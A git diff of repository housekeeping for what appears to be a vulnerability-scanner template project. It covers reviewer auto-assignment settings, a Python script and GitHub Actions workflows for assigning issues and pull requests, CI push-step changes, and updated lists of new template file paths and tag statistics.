diff --git a/.github/auto_assign.yml b/.github/auto_assign.yml index a93c1afdc2..f95bae788b 100644 --- a/.github/auto_assign.yml +++ b/.github/auto_assign.yml @@ -1,14 +1,14 @@ # Set to true to add reviewers to pull requests -addReviewers: true +addReviewers: false # Set to true to add assignees to pull requests -addAssignees: true +addAssignees: false # A list of reviewers to be added to pull requests (GitHub user name) reviewers: + - ritikchaddha - pussycat0x - DhiyaneshGeek - - ritikchaddha # A number of reviewers added to the pull request # Set 0 to add all the reviewers (default: 0) @@ -16,9 +16,9 @@ numberOfReviewers: 1 # A list of assignees, overrides reviewers if set assignees: + - pussycat0x - ritikchaddha - DhiyaneshGeek - - pussycat0x # A number of assignees to add to the pull request # Set to 0 to add all of the assignees. diff --git a/.github/scripts/assign_tasks.py b/.github/scripts/assign_tasks.py new file mode 100644 index 0000000000..03b35de468 --- /dev/null +++ b/.github/scripts/assign_tasks.py @@ -0,0 +1,139 @@ +import requests +import sys +import json + +# GitHub credentials +password = sys.argv[3] + +repo_owner = "projectdiscovery" +repo_name = "nuclei-templates" +pr_user_list = ["DhiyaneshGeek", "pussycat0x", "ritikchaddha"] +issue_user_list = ["princechaddha", "DhiyaneshGeek", "pussycat0x", "ritikchaddha"] + +headers = {'Authorization': f'Bearer {password}', + 'Accept': 'application/vnd.github+json', + 'X-GitHub-Api-Version': '2022-11-28'} + +def get_issue_assignee(issue_number): + issue_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues?per_page=2" + response = requests.get(issue_url, headers=headers) + + if response.status_code == 200: + issue_data = response.json()[1] + assignee = issue_data["assignee"]["login"] if issue_data["assignee"] else "None" + return assignee + else: + print(f"Failed to fetch assignee for issue #{issue_number}") + return None + +def assign_issue_or_pr(user, issue_number): + url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/issues/{issue_number}/assignees" + data = { "assignees": [user] } + response = requests.post(url, headers=headers, data=json.dumps(data)) + + if response.status_code == 201: + print(f"Assigned issue #{issue_number} to {user}") + else: + print(f"Failed to assign issue #{issue_number} to {user}. Status code: {response.status_code}") + +def get_pr_assignee_and_reviewer(pull_request_number): + pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls?per_page=2' + response = requests.get(pull_url, headers=headers) + + if response.status_code == 200: + pull_request_data = response.json()[1] + assignee = pull_request_data['assignee']['login'] if pull_request_data['assignee'] else None + reviewers = [reviewer['login'] for reviewer in pull_request_data['requested_reviewers']] + + return assignee, reviewers + else: + print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}") + return None, None + +def get_pr_author(pull_request_number): + pull_url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}' + response = requests.get(pull_url, headers=headers) + + if response.status_code == 200: + pull_request_data = response.json() + author = pull_request_data['user']['login'] + return author + + else: + print(f"Failed to retrieve pull request #{pull_request_number}. Response: {response.text}") + return None + +def review_pr(user, pull_request_number): + url = f'https://api.github.com/repos/{repo_owner}/{repo_name}/pulls/{pull_request_number}/requested_reviewers' + data = { 'reviewers': [user] } + response = requests.post(url, headers=headers, data=json.dumps(data)) + + if response.status_code == 201: + print(f"Review request for pull request #{pull_request_number} sent to {user} successfully.") + else: + print(f"Failed to send review request for pull request #{pull_request_number}. Response: {response.text}") + +def main(): + if len(sys.argv) != 4: + print("Usage: python assign_tasks.py ") + sys.exit(1) + + issue_number = int(sys.argv[1]) + type_ = sys.argv[2] + if type_ == 'pr': + assignee, reviewers = get_pr_assignee_and_reviewer(issue_number - 1) + author = get_pr_author(issue_number) + + if reviewers: + try: + index = pr_user_list.index(reviewers[0]) + try: + reviewer = pr_user_list[index + 1] + except: + reviewer = pr_user_list[0] + if reviewer == author: + reviewer = pr_user_list(pr_user_list.index(reviewer) + 1) + review_pr(reviewer, issue_number) + else: + review_pr(reviewer, issue_number) + + except Exception as e: + reviewer = pr_user_list[0] + review_pr(reviewer, issue_number) + else: + for user in pr_user_list: + if (user != author): + reviewer = user + review_pr(reviewer, issue_number) + break + + if assignee: + try: + index = pr_user_list.index(assignee) + if (pr_user_list[index + 1] == reviewer): + assign_issue_or_pr(pr_user_list[index + 2], issue_number) + else: + assign_issue_or_pr(pr_user_list[index + 1], issue_number) + except Exception as e: + if (pr_user_list[0] == reviewer): + assign_issue_or_pr(pr_user_list[1], issue_number) + else: + assign_issue_or_pr(pr_user_list[0], issue_number) + else: + if (pr_user_list[0] == reviewer): + assign_issue_or_pr(pr_user_list[1], issue_number) + else: + assign_issue_or_pr(pr_user_list[0], issue_number) + elif type_ == 'issue': + assignee = get_issue_assignee(issue_number-1) + + if assignee: + try: + index = issue_user_list.index(assignee) + assign_issue_or_pr(issue_user_list[index + 1], issue_number) + except Exception as e: + assign_issue_or_pr(issue_user_list[0], issue_number) + else: + assign_issue_or_pr(issue_user_list[0], issue_number) + +main() diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml new file mode 100644 index 0000000000..768e6fa520 --- /dev/null +++ b/.github/workflows/autoassign.yml @@ -0,0 +1,31 @@ +name: run assign_tasks.py +on: + pull_request: + types: [opened] + branches: + - main + issues: + types: [opened] + +jobs: + build: + permissions: write-all + runs-on: ubuntu-latest + env: + ASSIGN_TASK_TOKEN: ${{ secrets.GITHUB_TOKEN }} # github personal token + steps: + - name: checkout repo content + uses: actions/checkout@v2 # checkout the repository content + - name: setup python + uses: actions/setup-python@v4 + with: + python-version: '3.10' # install the python version needed + - name: install python packages + run: | + pip install requests + - name: execute python script on pr + if: ${{ github.event_name == 'pull_request' }} + run: python .github/scripts/assign_tasks.py ${{ github.event.pull_request.number }} pr ${{ secrets.GITHUB_TOKEN }} + - name: execute python script on issue opened + if: ${{ github.event_name == 'issues' }} + run: python .github/scripts/assign_tasks.py ${{ github.event.issue.number }} issue ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml index f77e1d44a5..00723f4aac 100644 --- a/.github/workflows/cache-purge.yml +++ b/.github/workflows/cache-purge.yml @@ -9,6 +9,7 @@ on: jobs: deploy: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: # Wait for 5 minutes - name: Wait for 2 minutes diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml deleted file mode 100644 index f2cf366026..0000000000 --- a/.github/workflows/cve-annotate.yml +++ /dev/null @@ -1,46 +0,0 @@ -name: ✍🏻 CVE Annotate - -on: - push: - branches: - - main - paths: - - '**/cves/**.yaml' - workflow_dispatch: - -jobs: - annotate: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - with: - fetch-depth: 0 - - - name: Set up Go - uses: actions/setup-go@v4 - with: - go-version: 1.20.x - - - name: cve-annotate install - run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest - - - name: Generate CVE Annotations - id: cve-annotate - run: | - cve-annotate -i . - git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - - - name: Commit files - if: steps.cve-annotate.outputs.CHANGES > 0 - run: | - git config --local user.email "action@github.com" - git config --local user.name "GitHub Action" - git add . - git commit -am "Auto Generated CVE annotations [$(date)] :robot:" - - - name: Push changes - if: steps.cve-annotate.outputs.CHANGES > 0 - uses: ad-m/github-push-action@master - with: - github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file diff --git a/.github/workflows/cve2json.yml b/.github/workflows/cve2json.yml index d44aefef48..412a6a8dd4 100644 --- a/.github/workflows/cve2json.yml +++ b/.github/workflows/cve2json.yml @@ -1,11 +1,11 @@ -name: Generate JSON Metadata of CVE Templates +name: 📝 CVE JSON Metadata on: push: branches: - main paths: - - '**/cves/' + - 'http/cves/' workflow_dispatch: # allows manual triggering of the workflow jobs: @@ -17,24 +17,28 @@ jobs: uses: actions/setup-go@v4 with: go-version: 1.19 - check-latest: true - - name: Run yaml2json.go to generate cves.json + - name: Run YAML2JSON + id: cves run: | - go env -w GO111MODULE=off - go get gopkg.in/yaml.v3 - go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json - md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt + go env -w GO111MODULE=off + go get gopkg.in/yaml.v3 + go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json + md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files + if: steps.cves.outputs.CHANGES > 0 run: | - git pull - git add cves.json cves.json-checksum.txt git config --local user.email "action@github.com" git config --local user.name "GitHub Action" + git add cves.json cves.json-checksum.txt git commit -m "Auto Generated cves.json [$(date)] :robot:" -a - name: Push changes - uses: ad-m/github-push-action@master - with: - github_token: ${{ secrets.GITHUB_TOKEN }} + if: steps.checksum.outputs.CHANGES > 0 + run: | + git pull --rebase + git push origin ${{ github.ref }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} \ No newline at end of file diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 84ba64ff77..915713f526 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -11,6 +11,7 @@ on: jobs: checksum: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v3 with: @@ -40,7 +41,9 @@ jobs: git commit -am "Auto Generated Templates Checksum [$(date)] :robot:" - name: Push changes - uses: ad-m/github-push-action@master - with: - github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file + if: steps.checksum.outputs.CHANGES > 0 + run: | + git pull --rebase + git push origin ${{ github.ref }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} \ No newline at end of file diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 9959214432..f933d5078c 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -11,6 +11,7 @@ on: jobs: index: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Set up Go uses: actions/setup-go@v4 diff --git a/.github/workflows/templateman.yml b/.github/workflows/templateman.yml new file mode 100644 index 0000000000..3c4ae4794f --- /dev/null +++ b/.github/workflows/templateman.yml @@ -0,0 +1,48 @@ +name: 🤖 TemplateMan + +on: + push: + branches: + - main + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + templateman: + runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' + steps: + - uses: actions/checkout@master + with: + fetch-depth: 0 + + - name: Set up Go + uses: actions/setup-go@v4 + with: + go-version: 1.20.x + + - name: Install TemplateMan CLI Client + run: | + go install -v github.com/projectdiscovery/nuclei/v2/cmd/tmc@dev + + - name: Run TemplateMan + id: tmc + run: | + tmc -i $GITHUB_WORKSPACE -mr + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT + + - name: Commit files + if: steps.tmc.outputs.CHANGES > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit --allow-empty -m "TemplateMan Update [$(date)] :robot:" -a + + - name: Push changes + if: steps.tmc.outputs.CHANGES > 0 + run: | + git pull --rebase + git push origin ${{ github.ref }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.new-additions b/.new-additions index 8f7f5f763c..d642f0a641 100644 --- a/.new-additions +++ b/.new-additions @@ -1,50 +1,42 @@ -http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml -http/credential-stuffing/cloud/atlassian-login-check.yaml -http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml -http/credential-stuffing/cloud/chefio-login-check.yaml -http/credential-stuffing/cloud/codepen-login-check.yaml -http/credential-stuffing/cloud/datadog-login-check.yaml -http/credential-stuffing/cloud/docker-hub-login-check.yaml -http/credential-stuffing/cloud/gitea-login-check.yaml -http/credential-stuffing/cloud/github-login-check.yaml -http/credential-stuffing/cloud/postman-login-check.yaml -http/credential-stuffing/cloud/pulmi-login-check.yaml -http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml -http/credential-stuffing/self-hosted/grafana-login-check.yaml -http/credential-stuffing/self-hosted/jira-login-check.yaml -http/cves/2021/CVE-2021-24731.yaml -http/cves/2021/CVE-2021-27124.yaml -http/cves/2021/CVE-2021-40908.yaml -http/cves/2021/CVE-2021-40968.yaml -http/cves/2021/CVE-2021-40969.yaml -http/cves/2021/CVE-2021-40970.yaml -http/cves/2021/CVE-2021-40971.yaml -http/cves/2021/CVE-2021-40972.yaml -http/cves/2021/CVE-2021-40973.yaml -http/cves/2021/CVE-2021-43725.yaml -http/cves/2022/CVE-2022-28022.yaml -http/cves/2022/CVE-2022-28023.yaml -http/cves/2022/CVE-2022-31879.yaml -http/cves/2022/CVE-2022-31974.yaml -http/cves/2022/CVE-2022-31975.yaml -http/cves/2022/CVE-2022-31976.yaml -http/cves/2022/CVE-2022-31977.yaml -http/cves/2022/CVE-2022-31978.yaml -http/cves/2022/CVE-2022-31980.yaml -http/cves/2022/CVE-2022-31981.yaml -http/cves/2022/CVE-2022-31982.yaml -http/cves/2022/CVE-2022-31983.yaml -http/cves/2022/CVE-2022-31984.yaml -http/cves/2023/CVE-2023-0948.yaml -http/cves/2023/CVE-2023-1362.yaml -http/cves/2023/CVE-2023-2122.yaml -http/cves/2023/CVE-2023-2130.yaml -http/cves/2023/CVE-2023-29622.yaml -http/cves/2023/CVE-2023-29623.yaml -http/cves/2023/CVE-2023-32315.yaml -http/exposed-panels/addonfinance-portal.yaml -http/exposed-panels/asus-aicloud-panel.yaml -http/exposed-panels/earcu-panel.yaml -http/exposed-panels/misp-panel.yaml -http/exposed-panels/spotweb-login-panel.yaml -http/vulnerabilities/sitecore/sitecore-xml-xss.yaml +file/nodejs/admzip-path-overwrite.yaml +file/nodejs/express-lfr.yaml +file/nodejs/generic-path-traversal.yaml +file/nodejs/tar-path-overwrite.yaml +file/nodejs/xss-serialize-javascript.yaml +file/nodejs/zip-path-overwrite.yaml +http/cnvd/2020/CNVD-2020-63964.yaml +http/cves/2012/CVE-2012-6499.yaml +http/cves/2021/CVE-2021-46704.yaml +http/cves/2022/CVE-2022-40022.yaml +http/cves/2023/CVE-2023-0126.yaml +http/cves/2023/CVE-2023-0562.yaml +http/cves/2023/CVE-2023-0563.yaml +http/cves/2023/CVE-2023-1454.yaml +http/cves/2023/CVE-2023-20888.yaml +http/cves/2023/CVE-2023-20889.yaml +http/cves/2023/CVE-2023-24488.yaml +http/cves/2023/CVE-2023-25346.yaml +http/cves/2023/CVE-2023-26842.yaml +http/cves/2023/CVE-2023-26843.yaml +http/cves/2023/CVE-2023-27372.yaml +http/cves/2023/CVE-2023-31548.yaml +http/cves/2023/CVE-2023-33510.yaml +http/cves/2023/CVE-2023-34598.yaml +http/cves/2023/CVE-2023-34599.yaml +http/cves/2023/CVE-2023-34843.yaml +http/cves/2023/CVE-2023-35843.yaml +http/cves/2023/CVE-2023-35844.yaml +http/exposed-panels/axxon-client-panel.yaml +http/exposed-panels/jsherp-boot-panel.yaml +http/exposed-panels/openbullet2-panel.yaml +http/exposed-panels/syncserver-panel.yaml +http/exposed-panels/wd-mycloud-panel.yaml +http/exposures/configs/aws-config.yaml +http/exposures/configs/aws-credentials.yaml +http/misconfiguration/codeigniter-errorpage.yaml +http/misconfiguration/genieacs-default-jwt.yaml +http/misconfiguration/grav-register-admin.yaml +http/misconfiguration/installer/spip-install.yaml +http/misconfiguration/odoo-unprotected-database.yaml +http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml +http/vulnerabilities/vbulletin/arcade-php-sqli.yaml diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ccc3257d16..081d422cf7 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -30,8 +30,8 @@ git remote add upstream https://github.com/projectdiscovery/nuclei-templates ```sh git remote update -git checkout master -git rebase upstream/master +git checkout main +git rebase upstream/main ``` ## Step 3 : Create your Template Branch diff --git a/README.md b/README.md index ff099de1de..ff54d4f373 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 | -| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 | -| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | | -| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | | -| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | | -| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | | -| osint | 639 | geeknik | 220 | headless | 9 | | | | | -| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | | -| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | | +| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | +| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | +| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | +| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | +| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | +| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | +| xss | 648 | geeknik | 221 | headless | 9 | | | | | +| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 597 | ritikchaddha | 215 | cves.json | 1 | | | | | +| lfi | 551 | 0x_akoko | 179 | contributors.json | 1 | | | | | -**404 directories, 6542 files**. +**410 directories, 6626 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 854a7506a7..65e1903bd2 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1855},{"name":"panel","count":896},{"name":"wordpress","count":781},{"name":"exposure","count":677},{"name":"wp-plugin","count":672},{"name":"xss","count":646},{"name":"osint","count":639},{"name":"tech","count":602},{"name":"edb","count":596},{"name":"lfi","count":548},{"name":"cve2021","count":431},{"name":"rce","count":415},{"name":"cve2022","count":397},{"name":"packetstorm","count":369},{"name":"wpscan","count":347},{"name":"misconfig","count":293},{"name":"wp","count":288},{"name":"unauth","count":266},{"name":"token-spray","count":240},{"name":"cve2020","count":237},{"name":"osint-social","count":206},{"name":"top-200","count":205},{"name":"kev","count":199},{"name":"authenticated","count":195},{"name":"sqli","count":195},{"name":"","count":193},{"name":"config","count":192},{"name":"oast","count":164},{"name":"token","count":157},{"name":"cve2018","count":150},{"name":"iot","count":149},{"name":"cve2019","count":147},{"name":"apache","count":147},{"name":"default-login","count":146},{"name":"joomla","count":136},{"name":"file","count":128},{"name":"login","count":116},{"name":"cve2010","count":112},{"name":"redirect","count":102},{"name":"top-100","count":100},{"name":"files","count":100},{"name":"network","count":99},{"name":"router","count":97},{"name":"cms","count":93},{"name":"ssrf","count":92},{"name":"auth-bypass","count":79},{"name":"devops","count":77},{"name":"cve2017","count":76},{"name":"takeover","count":73},{"name":"install","count":69},{"name":"cve2023","count":66},{"name":"disclosure","count":66},{"name":"oracle","count":65},{"name":"intrusive","count":65},{"name":"seclists","count":60},{"name":"oss","count":57},{"name":"cve2015","count":54},{"name":"google","count":53},{"name":"cisco","count":51},{"name":"cve2016","count":51},{"name":"adobe","count":50},{"name":"fileupload","count":49},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"vulhub","count":44},{"name":"aem","count":44},{"name":"atlassian","count":44},{"name":"plugin","count":43},{"name":"osint-hobby","count":42},{"name":"cve2014","count":42},{"name":"osint-porn","count":42},{"name":"hackerone","count":42},{"name":"vmware","count":42},{"name":"detect","count":40},{"name":"huntr","count":40},{"name":"generic","count":37},{"name":"traversal","count":37},{"name":"springboot","count":36},{"name":"jira","count":36},{"name":"kubernetes","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":34},{"name":"listing","count":33},{"name":"aws","count":31},{"name":"deserialization","count":31},{"name":"sap","count":28},{"name":"log4j","count":28},{"name":"dns","count":28},{"name":"osint-coding","count":28},{"name":"osint-tech","count":28},{"name":"cnvd","count":27},{"name":"gitlab","count":27},{"name":"proxy","count":25},{"name":"php","count":25},{"name":"microsoft","count":25},{"name":"jndi","count":25},{"name":"misc","count":25},{"name":"fuzz","count":25},{"name":"osint-shopping","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"firewall","count":24},{"name":"osint-finance","count":24},{"name":"zoho","count":23},{"name":"api","count":23},{"name":"k8s","count":23},{"name":"osint-business","count":23},{"name":"wp-theme","count":22},{"name":"ibm","count":21},{"name":"amazon","count":21},{"name":"cve2012","count":21},{"name":"weblogic","count":21},{"name":"cloud","count":21},{"name":"tomcat","count":20},{"name":"msf","count":20},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"github","count":19},{"name":"struts","count":19},{"name":"camera","count":19},{"name":"jenkins","count":19},{"name":"dlink","count":19},{"name":"ftp","count":18},{"name":"service","count":18},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"lfr","count":17},{"name":"ssl","count":16},{"name":"cve2011","count":16},{"name":"nginx","count":16},{"name":"backup","count":16},{"name":"xxe","count":16},{"name":"printer","count":16},{"name":"admin","count":16},{"name":"osint-blog","count":16},{"name":"android","count":15},{"name":"cve2009","count":15},{"name":"status","count":15},{"name":"woocommerce","count":14},{"name":"mail","count":14},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"confluence","count":14},{"name":"osint-art","count":14},{"name":"osint-health","count":14},{"name":"java","count":14},{"name":"cve2013","count":14},{"name":"citrix","count":14},{"name":"audit","count":14},{"name":"jboss","count":14},{"name":"zyxel","count":14},{"name":"osint-political","count":13},{"name":"magento","count":13},{"name":"login-check","count":13},{"name":"cve2008","count":13},{"name":"azure","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"osint-dating","count":13},{"name":"creds-stuffing","count":13},{"name":"laravel","count":13},{"name":"fortigate","count":13},{"name":"kafka","count":12},{"name":"drupal","count":12},{"name":"rails","count":12},{"name":"ruby","count":12},{"name":"auth","count":12},{"name":"airflow","count":12},{"name":"netgear","count":12},{"name":"netsweeper","count":12},{"name":"webserver","count":12},{"name":"vpn","count":12},{"name":"microweber","count":12},{"name":"graphql","count":12},{"name":"grafana","count":12},{"name":"backdoor","count":12},{"name":"git","count":12},{"name":"ruijie","count":12},{"name":"xstream","count":11},{"name":"cnvd2021","count":11},{"name":"npm","count":11},{"name":"phpmyadmin","count":11},{"name":"coldfusion","count":11},{"name":"enum","count":11},{"name":"online-fire-reporting","count":11},{"name":"cisa","count":11},{"name":"osint-video","count":11},{"name":"setup","count":11},{"name":"dashboard","count":11},{"name":"docker","count":10},{"name":"dell","count":10},{"name":"headless","count":10},{"name":"ssh","count":10},{"name":"django","count":10},{"name":"ssti","count":10},{"name":"jolokia","count":10},{"name":"glpi","count":10},{"name":"spring","count":10},{"name":"sonicwall","count":10},{"name":"zimbra","count":10},{"name":"dedecms","count":10},{"name":"digitalocean","count":10},{"name":"pfsense","count":9},{"name":"solarview","count":9},{"name":"fastjson","count":9},{"name":"windows","count":9},{"name":"osint-news","count":9},{"name":"gitea","count":9},{"name":"scada","count":9},{"name":"vcenter","count":9},{"name":"installer","count":9},{"name":"cache","count":9},{"name":"symfony","count":9},{"name":"prometheus","count":9},{"name":"zabbix","count":9},{"name":"versa","count":9},{"name":"thinkphp","count":9},{"name":"iis","count":9},{"name":"sitecore","count":9},{"name":"firebase","count":9},{"name":"wso2","count":9},{"name":"kube","count":9},{"name":"opencats","count":9},{"name":"console","count":8},{"name":"atom","count":8},{"name":"config-audit","count":8},{"name":"unauthenticated","count":8},{"name":"smtp","count":8},{"name":"icewarp","count":8},{"name":"oauth","count":8},{"name":"mirai","count":8},{"name":"recon","count":8},{"name":"redis","count":8},{"name":"elasticsearch","count":8},{"name":"druid","count":8},{"name":"emerge","count":8},{"name":"spotweb","count":8},{"name":"ecology","count":8},{"name":"solr","count":8},{"name":"cisco-switch","count":8},{"name":"jetbrains","count":8},{"name":"bypass","count":8},{"name":"bucket","count":8},{"name":"hms","count":8},{"name":"metadata","count":8},{"name":"crlf","count":8},{"name":"cnvd2020","count":8},{"name":"db","count":8},{"name":"ognl","count":8},{"name":"go","count":7},{"name":"gogs","count":7},{"name":"huawei","count":7},{"name":"squirrelmail","count":7},{"name":"shopify","count":7},{"name":"avtech","count":7},{"name":"samsung","count":7},{"name":"nodejs","count":7},{"name":"maps","count":7},{"name":"fortios","count":7},{"name":"seeyon","count":7},{"name":"blind","count":7},{"name":"ofbiz","count":7},{"name":"websphere","count":7},{"name":"nagiosxi","count":7},{"name":"manager","count":7},{"name":"default-page","count":7},{"name":"nagios","count":7},{"name":"exchange","count":7},{"name":"sophos","count":7},{"name":"doctor-appointment-system","count":6},{"name":"minio","count":6},{"name":"opensis","count":6},{"name":"vms","count":6},{"name":"keycloak","count":6},{"name":"filemanager","count":6},{"name":"zhiyuan","count":6},{"name":"cobbler","count":6},{"name":"fpd","count":6},{"name":"jetty","count":6},{"name":"plesk","count":6},{"name":"microstrategy","count":6},{"name":"slack","count":6},{"name":"nexus","count":6},{"name":"node","count":6},{"name":"elfinder","count":6},{"name":"c2","count":6},{"name":"kubelet","count":6},{"name":"lucee","count":6},{"name":"symantec","count":6},{"name":"database","count":6},{"name":"pmb","count":6},{"name":"odoo","count":6},{"name":"python","count":6},{"name":"vbulletin","count":6},{"name":"newrelic","count":6},{"name":"jamf","count":6},{"name":"openvpn","count":6},{"name":"artica","count":6},{"name":"mongodb","count":6},{"name":"liferay","count":6},{"name":"bigip","count":6},{"name":"s3","count":6},{"name":"activemq","count":6},{"name":"rconfig","count":6},{"name":"moodle","count":6},{"name":"solarwinds","count":6},{"name":"magmi","count":6},{"name":"leak","count":6},{"name":"awstats","count":5},{"name":"nacos","count":5},{"name":"parallels","count":5},{"name":"adminer","count":5},{"name":"avideo","count":5},{"name":"ec2","count":5},{"name":"cockpit","count":5},{"name":"scan","count":5},{"name":"firmware","count":5},{"name":"prestashop","count":5},{"name":"fatpipe","count":5},{"name":"ir","count":5},{"name":"cacti","count":5},{"name":"hashicorp","count":5},{"name":"apisix","count":5},{"name":"sql","count":5},{"name":"facebook","count":5},{"name":"metinfo","count":5},{"name":"gocd","count":5},{"name":"error","count":5},{"name":"carrental","count":5},{"name":"alibaba","count":5},{"name":"hybris","count":5},{"name":"openemr","count":5},{"name":"akamai","count":5},{"name":"74cms","count":5},{"name":"heroku","count":5},{"name":"microfocus","count":5},{"name":"storage","count":5},{"name":"elastic","count":5},{"name":"rseenet","count":5},{"name":"tikiwiki","count":5},{"name":"paypal","count":5},{"name":"ruckus","count":5},{"name":"avaya","count":5},{"name":"square","count":5},{"name":"strapi","count":5},{"name":"circarlife","count":5},{"name":"typo3","count":5},{"name":"rfi","count":5},{"name":"elementor","count":4},{"name":"osint-archived","count":4},{"name":"log","count":4},{"name":"openfire","count":4},{"name":"tokens","count":4},{"name":"nosqli","count":4},{"name":"sangfor","count":4},{"name":"photo","count":4},{"name":"puppet","count":4},{"name":"rabbitmq","count":4},{"name":"artifactory","count":4},{"name":"mostra","count":4},{"name":"xmlrpc","count":4},{"name":"seagate","count":4},{"name":"hoteldruid","count":4},{"name":"thinkcmf","count":4},{"name":"linkerd","count":4},{"name":"axigen","count":4},{"name":"aspose","count":4},{"name":"hikvision","count":4},{"name":"kevinlab","count":4},{"name":"prtg","count":4},{"name":"jupyter","count":4},{"name":"pentaho","count":4},{"name":"panos","count":4},{"name":"redmine","count":4},{"name":"roxy","count":4},{"name":"ldap","count":4},{"name":"candidats","count":4},{"name":"stripe","count":4},{"name":"pixie","count":4},{"name":"umbraco","count":4},{"name":"newstatpress","count":4},{"name":"jellyfin","count":4},{"name":"mikrotik","count":4},{"name":"mysql","count":4},{"name":"tls","count":4},{"name":"bitbucket","count":4},{"name":"voip","count":4},{"name":"concrete","count":4},{"name":"beyondtrust","count":4},{"name":"mlflow","count":4},{"name":"ebs","count":4},{"name":"javascript","count":4},{"name":"couchdb","count":4},{"name":"tenda","count":4},{"name":"hpe","count":4},{"name":"yeswiki","count":4},{"name":"sonarqube","count":4},{"name":"mostracms","count":4},{"name":"gnuboard","count":4},{"name":"kentico","count":4},{"name":"bmc","count":4},{"name":"mautic","count":4},{"name":"caucho","count":4},{"name":"cve2007","count":4},{"name":"sendgrid","count":4},{"name":"horde","count":4},{"name":"cnvd2019","count":4},{"name":"resin","count":4},{"name":"webmin","count":4},{"name":"httpd","count":4},{"name":"hongdian","count":4},{"name":"zte","count":4},{"name":"ampache","count":4},{"name":"telerik","count":4},{"name":"postmessage","count":4},{"name":"mailchimp","count":4},{"name":"oa","count":4},{"name":"arcgis","count":4},{"name":"centos","count":4},{"name":"dropbear","count":4},{"name":"telesquare","count":4},{"name":"spark","count":4},{"name":"asp","count":4},{"name":"age-encryption","count":4},{"name":"cloudflare","count":4},{"name":"powerjob","count":4},{"name":"vrealize","count":4},{"name":"aura","count":4},{"name":"phppgadmin","count":4},{"name":"ems","count":4},{"name":"springcloud","count":4},{"name":"consul","count":4},{"name":"froxlor","count":4},{"name":"search","count":4},{"name":"royalevent"